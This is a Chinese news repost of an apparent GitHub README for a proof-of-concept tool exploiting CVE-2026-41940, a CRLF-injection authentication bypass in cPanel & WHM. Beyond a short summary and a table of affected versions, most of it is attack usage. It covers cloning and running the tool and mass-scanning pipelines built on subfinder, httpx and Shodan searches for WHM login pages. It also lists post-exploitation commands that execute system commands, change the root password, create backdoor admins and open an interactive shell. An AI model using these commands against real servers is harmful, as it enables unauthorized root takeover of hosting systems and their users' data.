ESC
科技 2 分钟阅读

CVE-2026-41940 PoC 工具公开:CVSS 10.0 满分漏洞可无凭据接管 cPanel/WHM 服务器

安全研究人员公开 CVE-2026-41940 的 PoC 利用工具。该漏洞为 cPanel & WHM 的严重身份验证绕过漏洞(CVSS 10.0),攻击者无需任何凭据,通过 Authorization 头注入 CRLF 序列篡改服务器端会话文件,即可获得 root 级 WHM 权限,可执行系统命令、修改 root 密码或创建后门管理员。多个版本受影响,运维人员应尽快升级至官方补丁版本。

来源:GitHub

CVE-2026-41940

⚠ 本工具仅出于教育或漏洞赏金目的而创建。严禁在受控环境之外未经授权使用。

描述

一款用于利用 CVE-2026-41940 的工具。该漏洞是 cPanel & WHM 中的一个严重身份验证绕过漏洞(CVSS 10.0),允许未经身份验证的攻击者通过 Authorization 头向服务器端会话文件注入 CRLF 序列,从而获得 root 级别的 WHM 访问权限——无需任何凭据。

工作原理

笼统地说,CVE-2026-41940 的利用源于 cPanel/WHM 处理身份验证会话的方式存在缺陷。攻击通常始于向登录界面发送的一个正常请求,应用程序在完全校验用户凭据之前就过早地初始化了会话。由于对会话相关输入的处理不当,某些精心构造或意外的输入结构可以改变会话数据在服务器端的存储或解释方式。

受影响版本

版本受影响已修复
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

安装

git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

使用方法

工具需要指定目标域名。

单目标模式:

python cve.py -u https://target1.com:2083

也可以从 target.txt 文件(需自行创建)进行扫描:

python cve.py -l target.txt -t 50 -o result.json

基本扫描:

可用命令:

python cve.py -u https://victim1.com:2083 # 单目标扫描
python cve.py info -u https://victim1.com:2083 # 获取系统信息(版本、负载、磁盘使用情况)。
python cve.py host -u https://victim1.com:2083 # 获取目标服务器的主机名。

漏洞利用后的操作

# 列出服务器上的所有账户
python cve.py list -u https://target.com:2087

# 操作系统命令
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# 获取服务器信息(主机名、磁盘、MySQL 主机)
python cve.py info -u https://target.com:2087

# 修改 root 密码
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# 交互式 WHM shell
python cve.py shell -u https://target.com:2087

管道流水线

# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# 从 scope 列表
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Shodan 结果
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# 多个来源组合
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

WHM Shell 模式

成功执行后,你可以打开一个交互式 WHM shell:

python cve.py shell -u

所有 shell 命令

命令说明
id显示用户 ID
hostname获取服务器主机名
accounts列出所有用户账户
info负载、磁盘、MySQL 主机、版本
cat <path>读取文件内容
exec <cmd>执行系统命令
newadmin <user> <pass>创建后门 WHM 管理员
passwd <pass>修改 root 密码
l [path]列出目录
help显示所有命令
exit退出 shell 模式

CLI 参考

usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target(目标):
  -u, --url URL          单个目标 URL(例如 https://host:2087)
  -l, --list LIST        包含 URL 的文件(每行一个)
  --hostname HOSTNAME    覆盖规范的 Host 头(自动发现)

Scan(扫描):
  -t, --threads N        并发线程数(默认:10)
  --timeout N            请求超时秒数(默认:15)
  --rate-limit N         目标之间的延迟(默认:0)
  --force                跳过 cPanel 检测

Post-Exploit(漏洞利用后):
  --action ACTION        操作:list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          新的 root 密码(--action passwd)
  --cmd CMD              操作系统命令(--action cmd/exec)
  --new-user USER        新的 cPanel 用户名(--action adduser)
  --new-domain DOMAIN    新的 cPanel 域名(--action adduser)

Output(输出):
  -o, --output FILE      将结果保存到 JSON 文件
  --no-color             禁用 ANSI 颜色

免责声明

⚠ 本工具仅出于教育或漏洞赏金目的而创建。严禁在受控环境之外未经授权使用。